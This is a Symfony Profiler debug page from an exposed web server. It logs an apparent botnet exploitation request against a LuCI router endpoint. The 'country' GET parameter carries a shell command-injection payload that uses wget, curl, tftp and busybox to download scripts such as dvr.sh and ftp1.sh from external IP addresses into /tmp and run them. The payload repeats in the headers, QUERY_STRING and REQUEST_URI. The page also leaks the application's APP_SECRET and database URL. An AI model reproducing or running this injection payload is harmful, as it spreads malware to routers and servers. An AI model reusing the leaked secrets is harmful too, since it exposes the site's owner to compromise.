Symfony Profiler

Settings

n/a

Request

GET Parameters

Key	Value
country	"$(id>`wget http://193.111.248.148:5001; curl http://193.111.248.148:5001; wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; tftp 103.161.34.97 -c get tftp1.sh && chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; tftp -r tftp2.sh -g 103.161.34.97 && chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh; /bin/busybox wget -g 103.161.34.97 -l /tmp/.oxy -r /bins/; /bin/busybox wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox tftp 103.161.34.97 -c get tftp1.sh && /bin/busybox chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; /bin/busybox tftp -r tftp2.sh -g 103.161.34.97 && /bin/busybox chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh`)"
form	"country"
operation	"write"

Key

Value

country

"$(id>`wget http://193.111.248.148:5001; curl http://193.111.248.148:5001; wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; tftp 103.161.34.97 -c get tftp1.sh && chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; tftp -r tftp2.sh -g 103.161.34.97 && chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh; /bin/busybox wget -g 103.161.34.97 -l /tmp/.oxy -r /bins/; /bin/busybox wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox tftp 103.161.34.97 -c get tftp1.sh && /bin/busybox chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; /bin/busybox tftp -r tftp2.sh -g 103.161.34.97 && /bin/busybox chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh`)"

form

"country"

operation

"write"

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key	Value
_stopwatch_token	"733191"

Request Headers

Header	Value
accept-encoding	"gzip"
host	"54.158.234.202"
user-agent	"Go-http-client/1.1"
x-php-ob-level	"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header	Value
cache-control	"no-cache, private"
content-type	"text/html; charset=utf-8"
date	"Fri, 20 Sep 2024 21:39:50 GMT"
location	"http://www.54.158.234.202/cgi-bin/luci/;stok=/locale?country=%24%28id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60%29&form=country&operation=write"
x-debug-token	"c33d7a"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages

Stateless check enabled

Session not used.

Flashes

No flash messages were created.

Server Parameters

Defined in .env

Key	Value
APP_SECRET	"0468dc9487509ad162025c82176e60a9"
CORS_ALLOW_ORIGIN	"^https?://(localhost\|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL	"postgresql://app:!ChangeMe!@127.0.0.1:5432/db_name?serverVersion=16&charset=utf8"
EWZ_RECAPTCHA_SECRET	""
EWZ_RECAPTCHA_SITE_KEY	""
GOOGLE_RECAPTCHA_SECRET	""
GOOGLE_RECAPTCHA_SITE_KEY	""

Defined as regular env variables

Key	Value
APP_DEBUG	"1"
APP_ENV	"test"
CONTENT_LENGTH	""
CONTENT_TYPE	""
DOCUMENT_ROOT	"/var/www/campussuite/public"
DOCUMENT_URI	"/index.php"
FCGI_ROLE	"RESPONDER"
GATEWAY_INTERFACE	"CGI/1.1"
HOME	"/usr/share/httpd"
HTTP_ACCEPT_ENCODING	"gzip"
HTTP_HOST	"54.158.234.202"
HTTP_USER_AGENT	"Go-http-client/1.1"
PATH	"/usr/local/nvm/versions/node/v4.2.6/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF	"/index.php"
QUERY_STRING	"form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)"
REDIRECT_STATUS	"200"
REMOTE_ADDR	"85.90.246.83"
REMOTE_PORT	"47268"
REQUEST_METHOD	"GET"
REQUEST_SCHEME	"http"
REQUEST_TIME	1726868390
REQUEST_TIME_FLOAT	1726868390.6553
REQUEST_URI	"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)"
SCRIPT_FILENAME	"/var/www/campussuite/public/index.php"
SCRIPT_NAME	"/index.php"
SERVER_ADDR	"10.1.51.67"
SERVER_NAME	"_"
SERVER_PORT	"80"
SERVER_PROTOCOL	"HTTP/1.1"
SERVER_SOFTWARE	"nginx/1.22.1"
SYMFONY_DOTENV_VARS	"DATABASE_URL,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,EWZ_RECAPTCHA_SITE_KEY,EWZ_RECAPTCHA_SECRET,CORS_ALLOW_ORIGIN,APP_SECRET"
USER	"apache"

Symfony Profiler

Configuration Settings

Theme

Page Width

n/a

Request

GET Parameters

POST Parameters

Uploaded Files

Request Attributes

Request Headers

Request Content

Response

Response Headers

Cookies

Request Cookies

Response Cookies

Session

Session Metadata

Session Attributes

Session Usage

Flashes

Flashes

Server Parameters

Server Parameters

Defined in .env

Defined as regular env variables